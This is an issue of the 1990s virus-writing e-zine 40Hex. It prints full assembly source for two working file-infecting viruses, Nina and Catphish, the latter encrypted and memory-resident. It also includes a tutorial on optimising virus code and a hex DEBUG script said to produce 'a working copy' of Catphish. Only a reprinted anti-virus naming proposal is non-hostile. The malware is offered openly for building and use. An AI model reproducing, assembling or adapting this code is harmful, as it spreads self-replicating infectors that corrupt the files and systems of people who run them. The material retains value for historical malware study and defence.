40Hex Number 9 Volume 2 Issue 5

40Hex Number 9 Volume 2 Issue 5                                       File 006

Below is the Nina virus.  It's a 256 byte generic COM infector supposedly
originating in Bulgaria.  Although some minor portions are not as highly
optimised as they could be, the code is well-written.  Items of note include
the infection method, which is somewhat reminiscent of Jerusalem, the
installation check handler in int 21h, and the residency routine.  As always,
use Tasm to assemble.

                                                Dark Angel

.model tiny
.code
org 100h
; Disassembly done by Dark Angel of Phalcon/Skism
; for 40Hex Number 9, Volume 2 Issue 5
start:
                push    ax
                mov     ax,9753h                ; installation check
                int     21h
                mov     ax,ds
                dec     ax
                mov     ds,ax                   ; ds->program MCB
                mov     ax,ds:[3]               ; get size word
                push    bx
                push    es
                sub     ax,40h                  ; reserve 40h paragraphs
                mov     bx,ax
                mov     ah,4Ah                  ; Shrink memory allocation
                int     21h

                mov     ah,48h                  ; Allocate 3Fh paragraphs
                mov     bx,3Fh                  ; for the virus
                int     21h

                mov     es,ax                   ; copy virus to high
                xor     di,di                   ; memory
                mov     si,offset start + 10h   ; start at MCB:110h
                mov     cx,100h                 ; (same as PSP:100h)
                rep     movsb
                sub     ax,10h                  ; adjust offset as if it
                push    ax                      ; originated at 100h
                mov     ax,offset highentry
                push    ax
                retf

endfile         dw      100h ; size of infected COM file

highentry:
                mov     byte ptr cs:[0F2h],0AAh ; change MCB's owner so the
                                                ; memory isn't freed when the
                                                ; program terminates
                mov     ax,3521h                ; get int 21h vector
                int     21h

                mov     word ptr cs:oldint21,bx ; save it
                mov     word ptr cs:oldint21+2,es
                push    es
                pop     ds
                mov     dx,bx
                mov     ax,2591h                ; redirect int 91h to int 21h
                int     21h

                push    cs
                pop     ds
                mov     dx,offset int21
                mov     al,21h                  ; set int 21h to virus vector
                int     21h

                pop     ds                      ; ds->original program PSP
                pop     bx
                push    ds
                pop     es
return_COM:
                mov     di,100h                 ; restore original
                mov     si,endfile              ; file
                add     si,di                   ; adjust for COM starting
                mov     cx,100h                 ; offset
                rep     movsb
                pop     ax
                push    ds                      ; jmp back to original
                mov     bp,100h                 ; file (PSP:100)
                push    bp
                retf
exit_install:
                pop     ax                      ; pop CS:IP and flags in
                pop     ax                      ; order to balance the
                pop     ax                      ; stack and then exit the
                jmp     short return_COM        ; infected COM file
int21:
                cmp     ax,9753h                ; installation check?
                je      exit_install
                cmp     ax,4B00h                ; execute?
                jne     exitint21               ; nope, quit
                push    ax                      ; save registers
                push    bx
                push    cx
                push    dx
                push    ds
                call    infect
                pop     ds                      ; restore registers
                pop     dx
                pop     cx
                pop     bx
                pop     ax
exitint21:
                db      0eah ; jmp far ptr
oldint21        dd      ?

infect:
                mov     ax,3D02h                ; open file read/write
                int     91h
                jc      exit_infect
                mov     bx,ax
                mov     cx,100h
                push    cs
                pop     ds
                mov     ah,3Fh                  ; Read first 100h bytes
                mov     dx,offset endvirus
                int     91h
                mov     ax,word ptr endvirus
                cmp     ax,'MZ'                 ; exit if EXE
                je      close_exit_infect
                cmp     ax,'ZM'                 ; exit if EXE
                je      close_exit_infect
                cmp     word ptr endvirus+2,9753h ; exit if already
                je      close_exit_infect       ; infected
                mov     al,2                    ; go to end of file
                call    move_file_pointer
                cmp     ax,0FEB0h               ; exit if too large
                ja      close_exit_infect
                cmp     ax,1F4h                 ; or too small for
                jb      close_exit_infect       ; infection
                mov     endfile,ax              ; save file size
                call    write
                mov     al,0                    ; go to start of file
                call    move_file_pointer
                mov     dx,100h                 ; write virus
                call    write
close_exit_infect:
                mov     ah,3Eh                  ; Close file
                int     91h
exit_infect:
                retn

move_file_pointer:
                push    dx
                xor     cx,cx
                xor     dx,dx
                mov     ah,42h
                int     91h
                pop     dx
                retn

write:
                mov     ah,40h
                mov     cx,100h
                int     91h
                retn

                db      ' Nina '
endvirus:
                int     20h ; original COM file

                end     start
40Hex Number 9 Volume 2 Issue 5                                       File 007

-------------------------------------------------------------------------
                    A New Virus Naming Convention


At the Anti-Virus Product Developers Conference organized by NCSA in
Washington in November 1991 a committee was formed with the objective
of reducing the confusion in virus naming.  This committee consisted
of Fridrik Skulason (Virus Bulletin's technical editor) Alan Solomon
(S&S International) and Vesselin Bontchev (University of Hamburg).

The following naming convention was chosen:

The full name of a virus consists of up to four parts, desimited by
points ('.').  Any part may be missing, but at least one must be
present.  The general format is

        Family_Name.Group_Name.Major_Variant.Minor_Variant

Each part is an identifier, constructed with the characters
[A-Za-z0-9_$%&!'`#-].  The non-alphanumeric characters are permitted,
but should be avoided.  The identifier is case-insensitive, but
mixed-case characters should be used for readability.  Usage of
underscore ('_') (instead of space) is permitted, if it improves
readability.  Each part is up to 20 characters long (in order to allow
such monstriosities like "Green_Caterpillar"), but shorter names
should be used whenever possible.  However, if the shorter name is
just an abbreviation of the long name, it's better to use the long
name.

1. Family names.

The Family_Name represents the family to which the virus belongs.
Every attempt is made to group the existing viruses into families,
depending on the structural similarities of the viruses, but we
understand that a formal definition of a family is impossible.

When selecting a Family_Name, the following guidelines must be
applied:

                                "Must"

1) Do not use company names, brand names or names of living people,
   except where the virus is provably written by the person.  Common
   first names are permissible, but be careful - avoid if possible.
   In particular, avoid names associated with the anti-virus world.
   If a virus claims to be written by a particular person or company
   do not believe it without further proof.

2) Do not use an existing Family_Name, unless the viruses belong to
   the same family.

3) Do not invent a new name if there is an existing, acceptable name.

4) Do not use obscene or offensive names.

5) Do not assume that just because an infected sample arrives with a
   particular name, that the virus has that name.

6) Avoid numeric Family_Names like V845.  They should never be used as
   family names, as the members of the family may have different
   lengths.  When a new virus appears and a new Family_Name must be
   selected for it, it is acceptable to us a temporary name like
   _1234, but this must be changed as soon as possible.

                               "Should"

1) Avoid Family_Names like Friday 13th, September 22nd.  They should
   not be used as family names, as members of the family may have
   different activation dates.

2) Avoid geographic names which are based on the discovery site - the
   same virus might appear simultaneously in several different places.

3) If multiple acceptable names exist, select the original one, the
   one used by the majority of existing anti-virus programs or the
   more descriptive one.

                              "General"

1) All short (less than 60 bytes) overwriting viruses are grouped
   under a Family_Name, called Trivial.

2. Group names.

The Group_Name represents a major group of similar viruses in a virus
family, something like a sub-family.  Examples are AntiCAD (a
distinguished clone of the Jerusalem family, containing numerous
variants), or 1704 (a group of several virus variants in the Cascade
family).

When selecting a Group_Name, the same guidelines as for a Family_Name
should be applied, except that numeric names are more permissible -
but only if the respective group of viruses is well known under this
name.

3. Major variant name.

The major variant name is used to group viruses in a Group_Name, which
are very similar, and usually have one and the same infective length.
Again, the above guidelines are applied, with one major exception.
The Major_Variant is almost always a number, representing the
infective length, since it helps to distinguish that particular
sub-group of viruses.  The infective length should be used as
Major_Variant name always when it is known.  Exceptions of this rule
are:

1) When the infective length is not known, because the viruses are not
   yet analyzed.  In this case, consecutive numbers are used (1, 2, 3,
   etc.).  This should be changed as soon as more information about
   the viruses becomes known.

2) When an alpha-numeric name of the virus sub-group already exists
   and is popular, or more descriptive.

4. Minor variant name.

Minor variants are viruses with the same infective length, with
similar structure and behaviour, but slightly different.  Usually the
minor variants are different patches of one and the same virus.

When selecting a Minor_Variant name, usually consecutive letters of
the alphabet are used (A, B, C, etc...).  However, this is not a very
hard restriction and longer names can be used as well, especially if
the virus is already known under this (longer) name, or if the name is
more descriptive than just a letter.


The producers of virus detection software are strongly usrged to use
the virus names proposed here. The anti-virus researchers are advised
to use the described guidelines when selecting names for new viruses,
in order to avoid further confusion.

If a scanner is not able to distinguish between tow minor variants of
a virus, it should output the virus name up to the recognized major
variant. For instance, if it cannot distinguish between
Dark_Avenger.2000.Traveller.Copy and Dark.Avenger.Traveller.Zopy, it
should report both variants of the virus as Dark.Avenger.Traveller.

If it is also not able to distinguish between the major variants, it
should report the virus up to the recognized group name.  That is, if
the scanner cannot make the difference between
Dark_Avenger.2000.Traveller.* and Dark_Avenger.2000.Die_Young, it
should report all the variants as Dark_Avenger.2000.
-------------------------------------------------------------------------

     We at Phalcon/Skism welcome the proposals of this new committee.  It
is a step in the right direction, helping clear up the mess caused by the
generation disorganisation which has dominated the virus naming conventions
to date.  Additionally, if implemented properly, it will aid in
identification of strains.  John McAfee's SCAN, which had been the best
virus scanner, fell from grace recently, when it implemented a new policy
of merging scan strings, causing confusion in identification.  Fridrik
Skulason's F-Prot is the current champion of virus identification.

     However, we must voice concerns that the rules are not strict enough.
There are clearly too few rules to cover the numerous viruses which
currently exist.  Family, group, and major variant names for most current
common viruses should be established now.  These guidelines need be created
ASAP to avoid later confusion.  In the example in the last two paragraphs,
Dark Avenger strains are labelled separately as Dark_Avenger.2000 and
Dark.Avenger.  Such confusion is simply not acceptable.

     Wherever possible, the current common names should be kept.  It would
be a shame if the world lost the Jerusalem family to some mad individual
who wishes to name it 1808.  The rules cover this, but it is important to
set this down initially before stupid people butcher the rules.  Number
names are neither informative nor interesting.  Imagine advertising a
product as being able to catch "the deadly 605 virus."  Some knobs have
proposed a numerical classification scheme of viruses.  They're living in a
dream world.

     We applaud the efforts of the committee and may only hope that anti-
virus developers attempt to adhere to the proposed rules.  Hopefully, Mr.
Skulason and Dr. Solomon will lead the way, converting their own products
to this new naming convention.  And who will classify the viruses?  We
propose an open forum for discussion on a large network such as UseNet or
FidoNet moderated by either a virus researcher or anti-virus developer.
This will allow input from many people, some of whom have particular
specialties within certain groups of viruses.
40Hex Number 9 Volume 2 Issue 5                                       File 008

                     ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
                     CODE OPTIMISATION, A BEGINNER'S GUIDE
                     ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
                             Written by Dark Angel
                     ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  
  When writing  a virus, size is a primary concern.  A bloated virus carrying
  unnecessary baggage  will run slower than its optimised counterpart and eat
  up more disk space.
  
  Never optimise  any code  before it  works fully, since altering code after
  optimisation often  messes up  the optimisation and, in turn, messes up the
  code.   After it works, the focus can shift to optimisation.  Always keep a
  backup of  the last  working copy of the virus, as optimisation often leads
  to improperly  working code.   With  this in  mind,  a  few  techniques  of
  optimisation will be introduced.
  
  There are  two types  of optimisation:  structural and  local.   Structural
  optimisation occurs  when shifting  the position  of code or rethinking and
  reordering the functions of the virus shorten its length.  A simple example
  follows:
  
  check_install:
    mov ax,1234h
    int 21h
    cmp bx,1234h
    ret
  
  install_virus:
    call check_install
    jz   exit_install
  
  If this  is the  only instance  that the procedure check_install is called,
  the following optimisation may be made:
  
  install_virus:
    mov ax,1234h
    int 21h
    cmp bx,1234h
    jz  exit_install
  
  The first fragment wastes a total of 4 bytes - 3 for the call and 1 for the
  ret.   Four bytes  may not seem to be worth the effort, but after many such
  optimisations, the  code size  may be  brought  down  significantly.    The
  reverse of  this optimisation,  using procedures in lieu of repetitive code
  fragments, may work in other instances.  Properly designed and well-thought
  out  code  will  allow  for  such  an  optimisation.    Another  structural
  optimisation:
  
  get attributes
  open file read/only
  read file
  close file
  exit if already infected
  clear attributes
  open file read/write
  get file time/date
  write new header
  move file pointer to end of file
  concatenate virus
  restore file time/date
  close file
  restore attributes
  exit
  
  Change the above to:
  
  get attributes
  clear attributes
  open file read/write
  read file
  if infected, exit to close file
  get file time/date
  move file pointer to end of file
  concatenate virus
  move file pointer to beginning
  write new header
  restore file time/date
  close file
  restore attributes
  exit
  
  By using  the second,  an open  file and  a close file are eliminated while
  adding only  one move file pointer request.  This can save a healthy number
  of bytes.
  
  Local, or  peephole, optimisation  is often  easier to  do than  structural
  optimisation.   It consists  of changing  individual  statements  or  short
  groups of statements to save bytes.
  
  The easiest  type of  peephole optimisation  is a simple replacement of one
  line with  a functional  equivalent that  takes  fewer  bytes.    The  8086
  instruction set abounds with such possibilities.  A few examples follow.
  
  Perhaps the most widespread optimisation, replace:
    mov ax,0 ; this instruction is 3 bytes long
    mov bp,0 ; mov reg, 0 with any reg = nonsegment register takes 3 bytes
  with
    xor ax,ax ; this takes but 2 bytes
    xor bp,bp ; mov reg, 0 always takes 2 bytes
  or even
    sub ax,ax ; also takes 2 bytes
    sub bp,bp
  
  One of  the easiest  optimisations, yet often overlooked by novices, is the
  merging of lines.  As an example, replace:
    mov bh,5h   ; two bytes
    mov bl,32h  ; two bytes
                ; total: four bytes
  with
    mov bx,532h ; three bytes, save one byte
  
  A very  useful optimisation  moving the  file handle from ax to bx follows.
  Replace:
    mov  bx,ax   ; 2 bytes
  with
    xchg ax,bx   ; 1 byte
  
  Another easy  optimisation which  can most  easily applied  to file pointer
  moving operations:
  Replace
    mov ax,4202h  ; save one byte from "mov ah,42h / mov al,2"
    xor dx,dx     ; saves one byte from "mov dx,0"
    xor cx,cx     ; same here
    int 21h
  with
    mov ax,4202h
    cwd           ; equivalent to "xor dx,dx" when ax < 8000h
    xor cx,cx
    int 21h
  
  Sometimes it may be desirable to use si as the delta offset variable, as an
  instruction  involving  [si]  takes  one  less  byte  to  encode  than  its
  equivalent using  [bp].   This does  NOT work  with  combinations  such  as
  [si+1].  Examples:
  
    mov  ax,[bp]                ; 3 bytes
    mov  word ptr cs:[bp],1234h ; 6 bytes
    add  ax,[bp+1]              ; 3 bytes - no byte savings will occur
  
    mov  ax,[si]                ; 2 bytes
    mov  word ptr cs:[si],1234h ; 5 bytes
    add  ax,[si+1]              ; 3 bytes - this is not smaller
  
  A somewhat strange and rather specialised optimisation:
    inc al  ; 2 bytes
    inc bl  ; 2 bytes
  versus
    inc ax  ; 1 byte
    inc bx  ; 1 byte
  
  A structural  optimisation can  also involve getting rid of redundant code.
  As a  virus related  example, consider  the  infection  routine.    In  few
  instances is an error-trapping routine after each interrupt call necessary.
  A single  "jc error" is needed, say after the first disk-writing interrupt,
  and if  that succeeds, the rest should also work fine.  Another possibility
  is to use a critical error handler instead of error checking.
  
  How about this example of optimised code:
    mov  ax, 4300h   ; get file attributes
    mov  dx, offset filename
    int  21h
  
    push dx          ; save filename
    push cx          ; and attributes on stack
  
    inc  ax          ; ax = 4301h = set file attributes
    push ax          ; save 4301h on stack
    xor  cx,cx       ; clear attributes
    int  21h
  
  ...rest of infection...
  
    pop  ax          ; ax = 4301h
    pop  cx          ; cx = original attributes of file
    pop  dx          ; dx-> original filename
    int  21h
  
  Optimisation is  almost always  code-specific.   Through a  combination  of
  restructuring and  line replacement,  a  good  programmer  can  drastically
  reduce the  size of  a virus.    By  gaining  a  good  feel  of  the  80x86
  instruction set,  many more  optimisations may  be found.   Above all, good
  program design will aid in creating small viruses.
40Hex Number 9 Volume 2 Issue 5                                       File 009

name    CATPHISH
        title   
code    segment  
        assume  cs:code, ds:code, es:code
        org     100h

;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
;                       FirstStrike presents:
;
;                        The Catphish Virus.    
;
;   The Catphish virus is a resident .EXE infector.
;                Size: 701 bytes (decimal).
;                No activation (bomb).
;                Saves date and file attributes.
;
;         If assembling, check_if_resident jump must be marked over
;           with nop after first execution (first execution will hang
;           system).
;
;         *** Source is made available to learn from, not to
;               change author's name and claim credit! ***

start:
        call    setup                             ; Find "delta offset".
setup:               
        pop     bp                              
        sub     bp, offset setup-100h
        jmp     check_if_resident                 ; See note above about jmp!

pre_dec_em:
        mov bx,offset infect_header-100h
        add bx,bp
        mov cx,endcrypt-infect_header

ror_em:
        mov dl,byte ptr cs:[bx]
        ror dl,1                                  ; Decrypt virus code
        mov byte ptr cs:[bx],dl                   ;   by rotating right.
        inc bx                                    
        loop ror_em

        jmp check_if_resident

;--------------------------------- Infect .EXE header -----------------------
;   The .EXE header modifying code below is my reworked version of 
;     Dark Angel's code found in his Phalcon/Skism virus guides.


infect_header:
          push bx
          push dx
          push ax



          mov     bx, word ptr [buffer+8-100h]    ; Header size in paragraphs
               ;  ^---make sure you don't destroy the file handle
          mov     cl, 4                           ; Multiply by 16.  Won't
          shl     bx, cl                          ; work with headers > 4096
                                                  ; bytes.  Oh well!
          sub     ax, bx                          ; Subtract header size from
          sbb     dx, 0                           ; file size
    ; Now DX:AX is loaded with file size minus header size
          mov     cx, 10h                         ; DX:AX/CX = AX Remainder DX
          div     cx
  
  
          mov     word ptr [buffer+14h-100h], dx  ; IP Offset
          mov     word ptr [buffer+16h-100h], ax  ; CS Displacement in module
  
  
          mov     word ptr [buffer+0Eh-100h], ax     ; Paragraph disp. SS
          mov     word ptr [buffer+10h-100h], 0A000h ; Starting SP
  
          pop ax
          pop dx

          add ax, endcode-start                   ; add virus size
          cmp ax, endcode-start
          jb fix_fault
          jmp execont


war_cry  db 'Cry Havoc, and let slip the Dogs of War!',0
v_name   db '[Catphish]',0                        ; Virus name.
v_author db 'FirstStrike',0                       ; Me.
v_stuff  db 'Kraft!',0


fix_fault:
          add dx,1d
  
execont:
          push ax      
          mov cl, 9    
          shr ax, cl   
          ror dx, cl   
          stc          
                       
          adc dx, ax   
          pop ax       
          and ah, 1    
          
  
          mov word ptr [buffer+4-100h], dx        ; Fix-up the file size in
          mov word ptr [buffer+2-100h], ax        ; the EXE header.
     
          pop bx
          retn                                    ; Leave subroutine

;----------------------------------------------------------------------------


check_if_resident:
        push es
        xor ax,ax 
        mov es,ax

        cmp word ptr es:[63h*4],0040h             ; Check to see if virus
        jnz grab_da_vectors                       ;   is already resident
        jmp exit_normal                           ;   by looking for a 40h
                                                  ;   signature in the int 63h
                                                  ;   offset section of 
                                                  ;   interrupt table.

grab_da_vectors:

        mov ax,3521h                              ; Store original int 21h
        int 21h                                   ;   vector pointer.
        mov word ptr cs:[bp+dos_vector-100h],bx
        mov word ptr cs:[bp+dos_vector+2-100h],es



load_high:
        push ds

find_chain:                                       ; Load high routine that
                                                  ;   uses the DOS internal
     mov ah,52h                                   ;   table function to find
     int 21h                                      ;   start of MCB and then
                                                  ;   scales up chain to
     mov ds,es: word ptr [bx-2]                   ;   find top. (The code
     assume ds:nothing                            ;   is long, but it is the 
                                                  ;   only code that would
     xor si,si                                    ;   work when an infected
                                                  ;   .EXE was to be loaded 
Middle_check:                                     ;   into memory.
     
     cmp byte ptr ds:[0],'M'
     jne Check4last

add_one:
     mov ax,ds
     add ax,ds:[3]
     inc ax

     mov ds,ax
     jmp Middle_check

Check4last:
     cmp byte ptr ds:[0],'Z'
     jne Error
     mov byte ptr ds:[0],'M'
     sub word ptr ds:[3],(endcode-start+15h)/16h+1
     jmp add_one

error:
     mov byte ptr ds:[0],'Z'
     mov word ptr ds:[1],008h
     mov word ptr ds:[3],(endcode-start+15h)/16h+1

     push ds
     pop ax
     inc ax
     push ax
     pop es





move_virus_loop:
        mov bx,offset start-100h                  ; Move virus into carved
        add bx,bp                                 ;   out location in memory.
        mov cx,endcode-start
        push bp
        mov bp,0000h

move_it:
        mov dl, byte ptr cs:[bx]
        mov byte ptr es:[bp],dl
        inc bp
        inc bx
        loop move_it
        pop bp



hook_vectors:

        mov ax,2563h                              ; Hook the int 21h vector
        mov dx,0040h                              ;   which means it will
        int 21h                                   ;   point to virus code in
                                                  ;   memory.
        mov ax,2521h
        mov dx,offset virus_attack-100h
        push es
        pop ds
        int 21h




        pop ds



exit_normal:                                      ; Return control to 
        pop es                                    ;   infected .EXE
        mov ax, es                                ;   (Dark Angle code.)
        add ax, 10h 
        add word ptr cs:[bp+OrigCSIP+2-100h], ax 
                                         
        cli
        add ax, word ptr cs:[bp+OrigSSSP+2-100h] 
        mov ss, ax
        mov sp, word ptr cs:[bp+OrigSSSP-100h]
        sti

        xor ax,ax
        xor bp,bp

endcrypt  label  byte        

        db 0eah                          
OrigCSIP dd 0fff00000h
OrigSSSP dd ?                    

exe_attrib dw ?
date_stamp dw ?
time_stamp dw ?



dos_vector dd ?                                   

buffer db 18h dup(?)                              ; .EXE header buffer.




;----------------------------------------------------------------------------


virus_attack proc  far
               assume cs:code,ds:nothing, es:nothing

        
        cmp ax,4b00h                              ; Infect only on file
        jz run_kill                               ;   executions.

leave_virus:
        jmp dword ptr cs:[dos_vector-100h]                                



run_kill:
        call infectexe
        jmp leave_virus





infectexe:                                        ; Same old working horse
        push ax                                   ;   routine that infects
        push bx                                   ;   the selected file.
        push cx
        push es
        push dx
        push ds
 
        

        mov cx,64d
        mov bx,dx

findname:
        cmp byte ptr ds:[bx],'.'
        jz o_k
        inc bx
        loop findname

pre_get_out:
        jmp get_out

o_k:
        cmp byte ptr ds:[bx+1],'E'                ; Searches for victims.
        jnz pre_get_out
        cmp byte ptr ds:[bx+2],'X'
        jnz pre_get_out
        cmp byte ptr ds:[bx+3],'E'
        jnz pre_get_out
       



getexe:
        mov ax,4300h
        call dosit

        mov word ptr cs:[exe_attrib-100h],cx

        mov ax,4301h
        xor cx,cx
        call dosit

exe_kill:
        mov ax,3d02h
        call dosit
        xchg bx,ax
        
        mov ax,5700h
        call dosit

        mov word ptr cs:[time_stamp-100h],cx
        mov word ptr cs:[date_stamp-100h],dx



        push cs
        pop ds

        mov ah,3fh
        mov cx,18h
        mov dx,offset buffer-100h
        call dosit

        cmp word ptr cs:[buffer+12h-100h],1993h   ; Looks for virus marker
        jnz infectforsure                         ;   of 1993h in .EXE 
        jmp close_it                              ;   header checksum 
                                                  ;   position.
infectforsure:
        call move_f_ptrfar

        push ax
        push dx


        call store_header

        pop dx
        pop ax

        call infect_header


        push bx
        push cx
        push dx
        

        mov bx,offset infect_header-100h
        mov cx,(endcrypt)-(infect_header)

rol_em:                                           ; Encryption via 
        mov dl,byte ptr cs:[bx]                   ;   rotating left.
        rol dl,1                                    
        mov byte ptr cs:[bx],dl
        inc bx
        loop rol_em

        pop dx
        pop cx
        pop bx

        mov ah,40h
        mov cx,endcode-start
        mov dx,offset start-100h
        call dosit

        push bx
        push cx
        push dx


pre_dec_em2:
        mov bx,offset infect_header-100h
        mov cx,endcrypt-infect_header

ror_em2:
        mov dl,byte ptr cs:[bx]
        ror dl,1                                  ; Decrypt virus code
        mov byte ptr cs:[bx],dl                   ;   by rotating right.
        inc bx                                    
        loop ror_em2

        pop dx
        pop cx
        pop bx


        mov word ptr cs:[buffer+12h-100h],1993h


        call move_f_ptrclose

        mov ah,40h
        mov cx,18h
        mov dx,offset buffer-100h
        call dosit

        mov ax,5701h
        mov cx,word ptr cs:[time_stamp-100h]
        mov dx,word ptr cs:[date_stamp-100h]
        call dosit

close_it:


        mov ah,3eh
        call dosit

get_out:


        pop ds
        pop dx

set_attrib:
        mov ax,4301h
        mov cx,word ptr cs:[exe_attrib-100h]
        call dosit


        pop es
        pop cx
        pop bx
        pop ax

        retn
        
;---------------------------------- Call to DOS int 21h ---------------------

dosit:                                            ; DOS function call code.
        pushf
        call dword ptr cs:[dos_vector-100h]
        retn

;----------------------------------------------------------------------------
                                                                            









;-------------------------------- Store Header -----------------------------
 
store_header:
        les  ax, dword ptr [buffer+14h-100h]      ; Save old entry point
        mov  word ptr [OrigCSIP-100h], ax
        mov  word ptr [OrigCSIP+2-100h], es
  
        les  ax, dword ptr [buffer+0Eh-100h]      ; Save old stack
        mov  word ptr [OrigSSSP-100h], es
        mov  word ptr [OrigSSSP+2-100h], ax

        retn

;---------------------------------------------------------------------------






;---------------------------------- Set file pointer ------------------------

move_f_ptrfar:                                    ; Code to move file pointer.
        mov ax,4202h
        jmp short move_f

move_f_ptrclose:
        mov ax,4200h

move_f:
        xor dx,dx
        xor cx,cx
        call dosit
        retn

;----------------------------------------------------------------------------


endcode         label       byte

endp

code ends
end  start   
                               



>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

              Below is a sample file that is already infected.
            Just cut out code and run through debug. Next rename 
            DUMMY.FIL to DUMMY.EXE and you have a working copy of
            your very own Catphish virus.

N DUMMY.FIL
E 0100 4D 5A F4 00 04 00 00 00 20 00 00 00 FF FF 23 00 
E 0110 00 A0 93 19 07 00 23 00 3E 00 00 00 01 00 FB 30 
E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0500 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0510 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0520 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0530 90 90 B8 00 4C CD 21 E8 00 00 5D 81 ED 03 00 90 
E 0540 90 90 BB 21 00 03 DD B9 41 01 2E 8A 17 D0 CA 2E 
E 0550 88 17 43 E2 F5 E9 93 00 A6 A4 A0 17 3C FA 02 63 
E 0560 08 A7 C7 56 87 07 B5 00 73 20 00 EF E3 13 2C 13 
E 0570 02 47 17 02 47 07 02 8F 0C 0B 02 00 41 B0 B4 0A 
E 0580 7B 04 7A 7B 04 E4 94 D7 96 21 86 E4 F2 40 90 C2 
E 0590 EC DE C6 58 40 C2 DC C8 40 D8 CA E8 40 E6 D8 D2 
E 05A0 E0 40 E8 D0 CA 40 88 DE CE E6 40 DE CC 40 AE C2 
